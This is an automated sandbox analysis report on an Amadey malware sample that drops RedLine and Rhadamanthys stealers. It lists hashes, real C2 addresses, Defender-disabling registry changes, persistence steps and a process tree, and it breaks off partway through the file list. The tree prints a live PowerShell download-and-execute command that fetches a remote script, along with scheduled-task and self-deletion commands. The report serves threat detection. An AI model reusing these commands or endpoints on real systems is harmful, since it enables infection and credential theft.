amadey | 40e974b1f19c11a040e5a0f1021cbeaaf7c6d74fdb2a3707a4eecedf3a2fd736

Analysis

max time kernel
150s
max time network
127s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
21-03-2023 14:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

40e974b1f19c11a040e5a0f1021cbeaaf7c6d74fdb2a3707a4eecedf3a2fd736.exe
Size

1.0MB
MD5

394dbf6f313cf71c35534b294268bc07
SHA1

a492e02cda5bd57a064866b0d1ca7c35186f9e7c
SHA256

40e974b1f19c11a040e5a0f1021cbeaaf7c6d74fdb2a3707a4eecedf3a2fd736
SHA512

fadfac999dc3e2c58425b2a3e132e0ea926d659b40566658143d5bf036770dfce33717e746af441e7ae6ce82db87c40d66cff9d15e40ddd06bfc8acc9ac8b18e
SSDEEP

24576:Zybs36ewAHxwcFuH9hAWAeON7h5gYUdrCoToG2:MgqaHtwX0JN7HglN

Score

10^/10

amadey redline rhadamanthys gena vint discovery evasion infostealer persistence spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.mdegmm.com/pdf/debug2.ps1

Extracted

Family

redline

Botnet

gena

193.233.20.30:4125

Attributes

auth_value
93c20961cb6b06b2d5781c212db6201e

Extracted

Family

redline

Botnet

vint

193.233.20.30:4125

Attributes

auth_value
fb8811912f8370b3d23bffda092d88d0

Extracted

Family

amadey

Version

3.68

62.204.41.87/joomla/index.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect rhadamanthys stealer shellcode 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4264-5769-0x00000000001D0000-0x00000000001EC000-memory.dmp	family_rhadamanthys
behavioral1/memory/4264-6106-0x00000000001D0000-0x00000000001EC000-memory.dmp	family_rhadamanthys

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

v4609vH.exetz9637.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	v4609vH.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	tz9637.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	tz9637.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	v4609vH.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	v4609vH.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	v4609vH.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	v4609vH.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	tz9637.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	tz9637.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	tz9637.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 20 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2748-195-0x00000000025D0000-0x0000000002616000-memory.dmp	family_redline
behavioral1/memory/2748-196-0x0000000002790000-0x00000000027D4000-memory.dmp	family_redline
behavioral1/memory/2748-197-0x0000000002790000-0x00000000027CE000-memory.dmp	family_redline
behavioral1/memory/2748-198-0x0000000002790000-0x00000000027CE000-memory.dmp	family_redline
behavioral1/memory/2748-200-0x0000000002790000-0x00000000027CE000-memory.dmp	family_redline
behavioral1/memory/2748-202-0x0000000002790000-0x00000000027CE000-memory.dmp	family_redline
behavioral1/memory/2748-206-0x0000000002790000-0x00000000027CE000-memory.dmp	family_redline
behavioral1/memory/2748-208-0x0000000002790000-0x00000000027CE000-memory.dmp	family_redline
behavioral1/memory/2748-204-0x0000000002790000-0x00000000027CE000-memory.dmp	family_redline
behavioral1/memory/2748-210-0x0000000002790000-0x00000000027CE000-memory.dmp	family_redline
behavioral1/memory/2748-212-0x0000000002790000-0x00000000027CE000-memory.dmp	family_redline
behavioral1/memory/2748-214-0x0000000002790000-0x00000000027CE000-memory.dmp	family_redline
behavioral1/memory/2748-216-0x0000000002790000-0x00000000027CE000-memory.dmp	family_redline
behavioral1/memory/2748-218-0x0000000002790000-0x00000000027CE000-memory.dmp	family_redline
behavioral1/memory/2748-220-0x0000000002790000-0x00000000027CE000-memory.dmp	family_redline
behavioral1/memory/2748-222-0x0000000002790000-0x00000000027CE000-memory.dmp	family_redline
behavioral1/memory/2748-224-0x0000000002790000-0x00000000027CE000-memory.dmp	family_redline
behavioral1/memory/2748-226-0x0000000002790000-0x00000000027CE000-memory.dmp	family_redline
behavioral1/memory/2748-228-0x0000000002790000-0x00000000027CE000-memory.dmp	family_redline
behavioral1/memory/2748-230-0x0000000002790000-0x00000000027CE000-memory.dmp	family_redline

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

23 1048 powershell.exe
24 3280 powershell.exe
26 3280 powershell.exe
27 1048 powershell.exe
Downloads MZ/PE file

flow	pid	process
23	1048	powershell.exe
24	3280	powershell.exe
26	3280	powershell.exe
27	1048	powershell.exe

Executes dropped EXE 14 IoCs

Processes:

zap3104.exezap4752.exezap8669.exetz9637.exev4609vH.exew82UP95.exexZUgo55.exey98Ci04.exelegenda.exesqlcmd.exesqlcmd.exeserv.exelegenda.exelegenda.exe

pid	process
3776	zap3104.exe
3088	zap4752.exe
4392	zap8669.exe
4432	tz9637.exe
2604	v4609vH.exe
2748	w82UP95.exe
3884	xZUgo55.exe
4536	y98Ci04.exe
4252	legenda.exe
4104	sqlcmd.exe
1208	sqlcmd.exe
4264	serv.exe
4940	legenda.exe
4676	legenda.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

1912 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1912	rundll32.exe

Windows security modification 2 TTPs 3 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

tz9637.exev4609vH.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	tz9637.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	v4609vH.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	v4609vH.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

zap4752.exezap8669.exe40e974b1f19c11a040e5a0f1021cbeaaf7c6d74fdb2a3707a4eecedf3a2fd736.exezap3104.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	zap4752.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	zap8669.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	zap8669.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	40e974b1f19c11a040e5a0f1021cbeaaf7c6d74fdb2a3707a4eecedf3a2fd736.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	40e974b1f19c11a040e5a0f1021cbeaaf7c6d74fdb2a3707a4eecedf3a2fd736.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	zap3104.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	zap3104.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	zap4752.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

serv.exe

pid process

4264 serv.exe
4264 serv.exe
4264 serv.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
4264	serv.exe
4264	serv.exe
4264	serv.exe

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

serv.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	serv.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	serv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	serv.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	serv.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	serv.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

5052 schtasks.exe
Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

2600 PING.EXE
3792 PING.EXE

pid	process
5052	schtasks.exe

pid	process
2600	PING.EXE
3792	PING.EXE

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

tz9637.exev4609vH.exew82UP95.exexZUgo55.exepowershell.exepowershell.exe

pid	process
4432	tz9637.exe
4432	tz9637.exe
2604	v4609vH.exe
2604	v4609vH.exe
2748	w82UP95.exe
2748	w82UP95.exe
3884	xZUgo55.exe
3884	xZUgo55.exe
1048	powershell.exe
1048	powershell.exe
3280	powershell.exe
3280	powershell.exe
1048	powershell.exe
3280	powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

tz9637.exev4609vH.exew82UP95.exexZUgo55.exepowershell.exepowershell.exeserv.exe

description	pid	process
Token: SeDebugPrivilege	4432	tz9637.exe
Token: SeDebugPrivilege	2604	v4609vH.exe
Token: SeDebugPrivilege	2748	w82UP95.exe
Token: SeDebugPrivilege	3884	xZUgo55.exe
Token: SeDebugPrivilege	1048	powershell.exe
Token: SeDebugPrivilege	3280	powershell.exe
Token: SeShutdownPrivilege	4264	serv.exe
Token: SeCreatePagefilePrivilege	4264	serv.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

40e974b1f19c11a040e5a0f1021cbeaaf7c6d74fdb2a3707a4eecedf3a2fd736.exezap3104.exezap4752.exezap8669.exey98Ci04.exelegenda.execmd.exesqlcmd.execmd.exesqlcmd.execmd.exe

description	pid	process	target process
PID 3980 wrote to memory of 3776	3980	40e974b1f19c11a040e5a0f1021cbeaaf7c6d74fdb2a3707a4eecedf3a2fd736.exe	zap3104.exe
PID 3980 wrote to memory of 3776	3980	40e974b1f19c11a040e5a0f1021cbeaaf7c6d74fdb2a3707a4eecedf3a2fd736.exe	zap3104.exe
PID 3980 wrote to memory of 3776	3980	40e974b1f19c11a040e5a0f1021cbeaaf7c6d74fdb2a3707a4eecedf3a2fd736.exe	zap3104.exe
PID 3776 wrote to memory of 3088	3776	zap3104.exe	zap4752.exe
PID 3776 wrote to memory of 3088	3776	zap3104.exe	zap4752.exe
PID 3776 wrote to memory of 3088	3776	zap3104.exe	zap4752.exe
PID 3088 wrote to memory of 4392	3088	zap4752.exe	zap8669.exe
PID 3088 wrote to memory of 4392	3088	zap4752.exe	zap8669.exe
PID 3088 wrote to memory of 4392	3088	zap4752.exe	zap8669.exe
PID 4392 wrote to memory of 4432	4392	zap8669.exe	tz9637.exe
PID 4392 wrote to memory of 4432	4392	zap8669.exe	tz9637.exe
PID 4392 wrote to memory of 2604	4392	zap8669.exe	v4609vH.exe
PID 4392 wrote to memory of 2604	4392	zap8669.exe	v4609vH.exe
PID 4392 wrote to memory of 2604	4392	zap8669.exe	v4609vH.exe
PID 3088 wrote to memory of 2748	3088	zap4752.exe	w82UP95.exe
PID 3088 wrote to memory of 2748	3088	zap4752.exe	w82UP95.exe
PID 3088 wrote to memory of 2748	3088	zap4752.exe	w82UP95.exe
PID 3776 wrote to memory of 3884	3776	zap3104.exe	xZUgo55.exe
PID 3776 wrote to memory of 3884	3776	zap3104.exe	xZUgo55.exe
PID 3776 wrote to memory of 3884	3776	zap3104.exe	xZUgo55.exe
PID 3980 wrote to memory of 4536	3980	40e974b1f19c11a040e5a0f1021cbeaaf7c6d74fdb2a3707a4eecedf3a2fd736.exe	y98Ci04.exe
PID 3980 wrote to memory of 4536	3980	40e974b1f19c11a040e5a0f1021cbeaaf7c6d74fdb2a3707a4eecedf3a2fd736.exe	y98Ci04.exe
PID 3980 wrote to memory of 4536	3980	40e974b1f19c11a040e5a0f1021cbeaaf7c6d74fdb2a3707a4eecedf3a2fd736.exe	y98Ci04.exe
PID 4536 wrote to memory of 4252	4536	y98Ci04.exe	legenda.exe
PID 4536 wrote to memory of 4252	4536	y98Ci04.exe	legenda.exe
PID 4536 wrote to memory of 4252	4536	y98Ci04.exe	legenda.exe
PID 4252 wrote to memory of 5052	4252	legenda.exe	schtasks.exe
PID 4252 wrote to memory of 5052	4252	legenda.exe	schtasks.exe
PID 4252 wrote to memory of 5052	4252	legenda.exe	schtasks.exe
PID 4252 wrote to memory of 3284	4252	legenda.exe	cmd.exe
PID 4252 wrote to memory of 3284	4252	legenda.exe	cmd.exe
PID 4252 wrote to memory of 3284	4252	legenda.exe	cmd.exe
PID 3284 wrote to memory of 4832	3284	cmd.exe	cmd.exe
PID 3284 wrote to memory of 4832	3284	cmd.exe	cmd.exe
PID 3284 wrote to memory of 4832	3284	cmd.exe	cmd.exe
PID 3284 wrote to memory of 748	3284	cmd.exe	cacls.exe
PID 3284 wrote to memory of 748	3284	cmd.exe	cacls.exe
PID 3284 wrote to memory of 748	3284	cmd.exe	cacls.exe
PID 3284 wrote to memory of 4828	3284	cmd.exe	cacls.exe
PID 3284 wrote to memory of 4828	3284	cmd.exe	cacls.exe
PID 3284 wrote to memory of 4828	3284	cmd.exe	cacls.exe
PID 3284 wrote to memory of 3476	3284	cmd.exe	cmd.exe
PID 3284 wrote to memory of 3476	3284	cmd.exe	cmd.exe
PID 3284 wrote to memory of 3476	3284	cmd.exe	cmd.exe
PID 3284 wrote to memory of 5040	3284	cmd.exe	cacls.exe
PID 3284 wrote to memory of 5040	3284	cmd.exe	cacls.exe
PID 3284 wrote to memory of 5040	3284	cmd.exe	cacls.exe
PID 3284 wrote to memory of 5028	3284	cmd.exe	cacls.exe
PID 3284 wrote to memory of 5028	3284	cmd.exe	cacls.exe
PID 3284 wrote to memory of 5028	3284	cmd.exe	cacls.exe
PID 4252 wrote to memory of 4104	4252	legenda.exe	sqlcmd.exe
PID 4252 wrote to memory of 4104	4252	legenda.exe	sqlcmd.exe
PID 4252 wrote to memory of 4104	4252	legenda.exe	sqlcmd.exe
PID 4104 wrote to memory of 3596	4104	sqlcmd.exe	cmd.exe
PID 4104 wrote to memory of 3596	4104	sqlcmd.exe	cmd.exe
PID 3596 wrote to memory of 1048	3596	cmd.exe	powershell.exe
PID 3596 wrote to memory of 1048	3596	cmd.exe	powershell.exe
PID 4252 wrote to memory of 1208	4252	legenda.exe	sqlcmd.exe
PID 4252 wrote to memory of 1208	4252	legenda.exe	sqlcmd.exe
PID 4252 wrote to memory of 1208	4252	legenda.exe	sqlcmd.exe
PID 1208 wrote to memory of 1184	1208	sqlcmd.exe	cmd.exe
PID 1208 wrote to memory of 1184	1208	sqlcmd.exe	cmd.exe
PID 1184 wrote to memory of 3280	1184	cmd.exe	powershell.exe
PID 1184 wrote to memory of 3280	1184	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\40e974b1f19c11a040e5a0f1021cbeaaf7c6d74fdb2a3707a4eecedf3a2fd736.exe
"C:\Users\Admin\AppData\Local\Temp\40e974b1f19c11a040e5a0f1021cbeaaf7c6d74fdb2a3707a4eecedf3a2fd736.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3980

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap3104.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap3104.exe
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3776

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap4752.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap4752.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3088

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap8669.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap8669.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4392

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz9637.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz9637.exe
5⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4432

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v4609vH.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v4609vH.exe
5⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2604

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w82UP95.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w82UP95.exe
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2748

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xZUgo55.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xZUgo55.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3884

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y98Ci04.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y98Ci04.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4536

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
"C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4252

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe" /F
4⤵
- Creates scheduled task(s)
PID:5052

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "legenda.exe" /P "Admin:N"&&CACLS "legenda.exe" /P "Admin:R" /E&&echo Y|CACLS "..\f22b669919" /P "Admin:N"&&CACLS "..\f22b669919" /P "Admin:R" /E&&Exit
4⤵
- Suspicious use of WriteProcessMemory
PID:3284

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5⤵
PID:4832

C:\Windows\SysWOW64\cacls.exe
CACLS "legenda.exe" /P "Admin:N"
5⤵
PID:748

C:\Windows\SysWOW64\cacls.exe
CACLS "legenda.exe" /P "Admin:R" /E
5⤵
PID:4828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5⤵
PID:3476

C:\Windows\SysWOW64\cacls.exe
CACLS "..\f22b669919" /P "Admin:N"
5⤵
PID:5040

C:\Windows\SysWOW64\cacls.exe
CACLS "..\f22b669919" /P "Admin:R" /E
5⤵
PID:5028

C:\Users\Admin\AppData\Local\Temp\1000114001\sqlcmd.exe
"C:\Users\Admin\AppData\Local\Temp\1000114001\sqlcmd.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4104

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"
5⤵
- Suspicious use of WriteProcessMemory
PID:3596

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1048

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000114001\sqlcmd.exe" >> NUL
5⤵
PID:4320

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:2600

C:\Users\Admin\AppData\Local\Temp\1000115001\sqlcmd.exe
"C:\Users\Admin\AppData\Local\Temp\1000115001\sqlcmd.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1208

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"
5⤵
- Suspicious use of WriteProcessMemory
PID:1184

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3280

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000115001\sqlcmd.exe" >> NUL
5⤵
PID:3940

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:3792

C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe
"C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe"
4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:4264

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
4⤵
- Loads dropped DLL
PID:1912

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
1⤵
- Executes dropped EXE
PID:4940

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
1⤵
- Executes dropped EXE
PID:4676

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA
Filesize
2KB

MD5
fc88b7748eb4cd37ae886a1c0813e4cf

SHA1
23e30b76fc94f0467a3efad342a91a3b84ff1eea

SHA256
3d81e317f8816680185517d7719e51fdbcd5807f9c629c4e3d0408820ec458da

SHA512
bb8ffaa2e8e581aa8d9a2e39b5f16c784d1431b4c18acc71b8fea84a4982d13a8ed1e5cf295c459ca35d8d4604c050210e0771386e7fe57d35c5ccd41fb92211

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_2DBE917624E9880FE0C7C5570D56E691
Filesize
1KB

MD5
cb684ec7fe8555f949182c7423dafdc2

SHA1
ec49f7b4b777fa1da40af5328785782127ffc52c

SHA256
8e17b090e2d07abf04860e961e601d8c663d3eaafd16190e6e6b6a4f018c0b0e

SHA512
ef627ca15ac143710b707ce28bd0cbe3447446db64c61f89d78f7c868cad07bd267563a7927ac4cd733adf2da3d58dcfadba54f8e0bc78e06d79cd389b77e500

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA
Filesize
482B

MD5
0faa7cb7f1b09d22fcf0b2963b01167a

SHA1
d6454bc7a6ed1cda016690f723e04b7652177421

SHA256
13f0b4c3bb9d44e19819d2fba8077f6aa94dce39b39b1f89f60b5c3093ca21f5

SHA512
55959d7d929e7f17a5a454586235ec26a27379dd665b265cd8052cfbb49cbe51d47299d36db98022931db2c6eaca1df4d076479aabc87b392cfefac507edc3e0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_2DBE917624E9880FE0C7C5570D56E691
Filesize
486B

MD5
b6d460be40deb9d1534c68ddb8d37b60

SHA1
451bbff14eb8f782fca5886f5405b990ee13f999

SHA256
3c9710c7e101a47ac079eca1a13f05b4590b7f66902d48488a5705df0e8854f5

SHA512
d235880a39cda116e28c8cdfd6601834c60689dedd7e9e23272e875ff2891144806931db853b25cd216bfea44b7a823870433c1108caecd42d35feda911a6de6

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000114001\sqlcmd.exe
Filesize
144KB

MD5
b5baf2e6261a1fb05bb2654c8d099dd6

SHA1
2a5b25fcb9e9f584d0a162b734c7dcc53c6e0550

SHA256
4a98a49f3b4b3013d38069110fccb50850cb2a42088bf7b49054da5cc0ef7a0d

SHA512
4ac6847ff23850bbdb04f696c85444ff2d1aa38cf508d60e6c1638e877b4233bf343e43cbcf84dd50151c593c5a181679488c207f8ea80dc088518f99e50d7d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000114001\sqlcmd.exe
Filesize
144KB

MD5
b5baf2e6261a1fb05bb2654c8d099dd6

SHA1
2a5b25fcb9e9f584d0a162b734c7dcc53c6e0550

SHA256
4a98a49f3b4b3013d38069110fccb50850cb2a42088bf7b49054da5cc0ef7a0d

SHA512
4ac6847ff23850bbdb04f696c85444ff2d1aa38cf508d60e6c1638e877b4233bf343e43cbcf84dd50151c593c5a181679488c207f8ea80dc088518f99e50d7d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000114001\sqlcmd.exe
Filesize
144KB

MD5
b5baf2e6261a1fb05bb2654c8d099dd6

SHA1
2a5b25fcb9e9f584d0a162b734c7dcc53c6e0550

SHA256
4a98a49f3b4b3013d38069110fccb50850cb2a42088bf7b49054da5cc0ef7a0d

SHA512
4ac6847ff23850bbdb04f696c85444ff2d1aa38cf508d60e6c1638e877b4233bf343e43cbcf84dd50151c593c5a181679488c207f8ea80dc088518f99e50d7d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000115001\sqlcmd.exe
Filesize
144KB

MD5
b5baf2e6261a1fb05bb2654c8d099dd6

SHA1
